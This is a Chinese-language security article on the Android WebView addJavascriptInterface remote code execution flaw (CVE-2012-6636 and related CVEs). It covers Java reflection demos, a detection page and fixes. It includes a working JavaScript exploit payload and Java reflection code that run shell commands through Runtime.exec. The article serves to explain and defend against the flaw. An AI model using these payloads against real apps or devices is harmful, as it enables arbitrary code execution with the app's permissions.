Android WebView 漏洞

☆ 来自 developer.android.com 的信息

Android 官方网站对addJavascriptInterface的介绍如下：

public void addJavascriptInterface (Object object, String name)  Added in API level 1

Injects the supplied Java object into this WebView. The object is injected into
the JavaScript context of the main frame, using the supplied name. This allows 
the Java object's methods to be accessed from JavaScript. For applications
targeted to API level JELLY_BEAN_MR1 and above, only public methods that are 
annotated with JavascriptInterface can be accessed from JavaScript. For applications
targeted to API level JELLY_BEAN or below, all public methods (including the inherited ones)
can be accessed, see the important security note below for implications.

Note that injected objects will not appear in JavaScript until the page is next
(re)loaded. For example:

class JsObject {
   @JavascriptInterface
   public String toString() { return "injectedObject"; }
}

webView.addJavascriptInterface(new JsObject(), "injectedObject");
webView.loadData("", "text/html", null);
webView.loadUrl("javascript:alert(injectedObject.toString())");

This method can be used to allow JavaScript to control the host application. 
This is a powerful feature, but also presents a security risk for apps targeting
JELLY_BEAN or earlier. Apps that target a version later than JELLY_BEAN are still
vulnerable if the app runs on a device running Android earlier than 4.2. The 
most secure way to use this method is to target JELLY_BEAN_MR1 and to ensure the
method is called only when running on Android 4.2 or later. With these older 
versions, JavaScript could use reflection to access an injected object's public
fields. Use of this method in a WebView containing untrusted content could allow
an attacker to manipulate the host application in unintended ways, executing 
Java code with the permissions of the host application. Use extreme care when 
using this method in a WebView which could contain untrusted content.
JavaScript interacts with Java object on a private, background thread of this 
WebView. Care is therefore required to maintain thread safety.

The Java object's fields are not accessible.
For applications targeted to API level LOLLIPOP and above, methods of injected 
Java objects are enumerable from JavaScript. Parameters object the Java object 
to inject into this WebView's JavaScript context. Null values are ignored.
name  the name used to expose the object in JavaScript

之所以提供addJavascriptInterface是为了WebView中的Javascript可以和本地的App
通讯，这确实是一个很强大的功能，这么做的好处在于本地App逻辑不变的情况下，不
需要升级App就可以对程序进行更新，修改相应的Web页面就可以了。

☆ 相关知识

WebView的使用方法

在layout中定义 , 在Activity的onCreate中加入下面的代码

WebView webview = new WebView(this);
setContentView(webview);
webview.loadUrl("http://slashdot.org/");

Java Reflection

反射是java语言提供的一种机制，使Java程序可以在运行时检查类、接口、方法和成员，
而不需要在编译的时候知道类的名字和方法等细节信息。

package Reflect;
import java.lang.reflect.Method;

class Demo {

public void a1() {
}

public void a2() {
}

}

class hello {

public static void main(String[] args) {

    Demo demo=new Demo();
    Class mObjectClass = demo.getClass();

    System.out.println(mObjectClass.getName());

    Method[] methods = mObjectClass.getMethods();
    for(Method method : methods){
        System.out.println("method = " + method.getName());
    }

    try {

        Class c = mObjectClass.forName("java.lang.Runtime");
        Method m = c.getMethod("getRuntime", null);
        m.setAccessible(true);
        Object obj = m.invoke(null, null);

        Class c2 = obj.getClass();
        String[] array = {"/bin/sh", "-c", "id > /tmp/id"};
        Method n = c2.getMethod("exec", array.getClass());
        n.invoke(obj, new Object[]{array});

    } catch (Throwable e) {
        System.out.println(e.toString());
    }
}

}

运行结果:

> javac -d . Reflect/hello.java
> java Reflect.hello

Reflect.Demo
method = a2
method = a1
method = wait
method = wait
method = wait
method = equals
method = toString
method = hashCode
method = getClass
method = notify
method = notifyAll

命令执行成功。

通过reflection 访问private

package Reflect;

import java.lang.reflect.Method;

class Demo {

private void a1() {
    System.out.println("I am a1");
}

public void a2() {
    System.out.println("I am a2");
}

}


class hello {

public static void main(String[] args) {

    Demo demo=new Demo();
    Class mObjectClass = demo.getClass();

    System.out.println(mObjectClass.getName());

    Method[] methods = mObjectClass.getDeclaredMethods();
    for(Method method : methods){
        System.out.println("method = " + method.getName());
    }

    try {
        Object o = mObjectClass.newInstance();
        methods[0].setAccessible(true);
        methods[0].invoke(o);
    } catch (Throwable e) {
    }
}

}

运行结果：

> javac -d . Reflect/hello.java
> java Reflect.hello

Reflect.Demo
method = a1
method = a2
I am a1

已经成功调用了Demo的private a1 方法

☆ 相关漏洞

CVE-2013-4710

Disney Mobile、eAccess、KDDI、NTT DOCOMO、SoftBank设备上的Android 3.0至4.1.x版
本中存在安全漏洞，该漏洞源于程序没有正确实现WebView类。远程攻击者可借助特制的网
页利用该漏洞执行任意Java对象的方法或造成拒绝服务（重启）

CVE-2012-6636 (关键的CVE)

该漏洞源于程序没有正确限制使用WebView.addJavascriptInterface方法，远程攻击者可
通过使用Java Reflection 利用该漏洞执行任意Java对象的方法。影响使用 API Level 16
以及之前的Android 系统。(Android 4.2 为 API Level 17)

CVE-2014-1939 searchBoxJavaBridge_ in Android Jelly Bean

此漏洞公布了一个可利用的Java Object “searchBoxJavaBridge_”

CVE-2014-7224

根据 android/webkit/AccessibilityInjector.java 代码中的介绍，发现当系统辅助
功能中的任意一项服务被开启后，所有由系统提供的WebView都会被加入两个JS objects，
分别为是”accessibility” 和 “accessibilityTraversal”。如果APP使用了系统的WebView
并且设置了setJavaScriptEnabled()，那么恶意攻击者就可以使用”accessibility” 和
“accessibilityTraversal” 这两个Java Bridge来执行远程攻击代码

分析

这些CVE中最核心的是CVE-2012-6636, 出现的问题是接口定义问题。是非常经典的
do a 变成 do b 的例子，后面的修复方法也是保证了do a 就是 do a。

☆ 漏洞检测

使用WebView访问下面页面，输出的接口名称则存在漏洞。

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>WebView漏洞检测</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0,
maximum-scale=1.0, user-scalable=0">
</head>
<body>
<p>
<b>如果当前app存在漏洞，将会在页面中输出存在漏洞的接口方便程序员做出修改：</b>
</p>
<script type="text/javascript">
function check()
{
    for (var obj in window) 
    {
        try {
            if ("getClass" in window[obj]) {
                try{
                    window[obj].getClass();
                    document.write('<span style="color:red">'+obj+'</span>');
                    document.write('<br />');
                }catch(e){
                }
            }
        } catch(e) {
        }
    }
}
check();
</script>
</body>
</html>

现代浏览器都实现基本一致的BOM，使得JavaScript和浏览器进行消息传递。
是否有getClass的方法，可以作为检测WebView漏洞依据。

在Android 4.1.1 原生系统上测试，在默认配置下，存在 searchBoxJavaBridge_
可以利用，CVE-2014-7224上的两个接口，并没有成功暴露。看了源代码后发现必须
打开Accessibility 设置中的Enhance Web accessibility 才会暴露这个两个接口，
因此CVE-2014-7224的影响并不像想象中的那么大。

☆ 漏洞利用的方法

<script>
function execute(cmd){
  return
window.jsinterface.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
execute(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']);
</script>

jsinterface是导出的Java对象， 测试成功，权限是app 的用户权限。

☆ 修复方法和现状

Google宣布不为小于Android 4.4 的系统提供WebView补丁, 具体可以参见链接：

https://community.rapid7.com/community/metasploit/blog/2015/01/11/google-no-longer-provides-patches-for-webview-jelly-bean-and-prior

要解决WebView的RCE漏洞，比较靠谱的方法是升级Android系统，至少要升级到
API level 17 (Android 4.2), WebView 除了最严重的RCE漏洞，还有各种SOP漏洞，所
以至少要升级到Android 4.4才能保证安全，小于Android 4.4 Google不提供补丁。
Android 4.4 以后使用以chrome为基础的WebView。

升级系统API level 17后，只有显示添加 @JavascriptInterface的方法才能被JavaScript
调用，这样反射就失去作用了。

removeJavascriptInterface("accessibility");
removeJavascriptInterface("accessibilityTraversal");
removeJavascriptInterface("searchBoxJavaBridge_");

☆ 参考链接

• http://developer.android.com/guide/webapps/webview.html
• http://developer.android.com/reference/android/webkit/WebView.html
• https://daoyuan14.github.io/news/newattackvector.html
• http://droidsploit.baidu.com/view/14100201.html
• http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html
• http://tutorials.jenkov.com/java-reflection/index.html
• http://javaxden.blogspot.sg/2007/08/hack-any-java-class-using-reflection.html
• http://www.programcreek.com/2013/09/java-reflection-tutorial/
• https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/
• https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/

☆ 思考

WebView 中还提供了一个方法让我们可以获得控制的机会

@Override
public boolean shouldOverrideUrlLoading(WebView view, String url) {
  if (url.substring(0,6).equalsIgnoreCase("yourscheme:")) {
    // parse the URL object and execute functions
  }
}

如果使用上面的代码，在网页的javascript中添加下面的代码，就可以进入后面的解析
URL流程，如果后续代码没有进行严格的检查可能会有一些其他的安全问题。

window.location = yourscheme://method?parameter=value

Google对这个方法的解释如下：

Give the host application a chance to take over the control when a new url 
is about to be loaded in the current WebView. If WebViewClient is not 
provided, by default WebView will ask Activity Manager to choose the proper 
handler for the url. If WebViewClient is provided, return true means the 
host application handles the url, while return false means the current 
WebView handles the url. This method is not called for requests using 
the POST "method".

其实就是当WebView加载新的URL时给App程序一个控制的机会，这还是有一些想象空间的。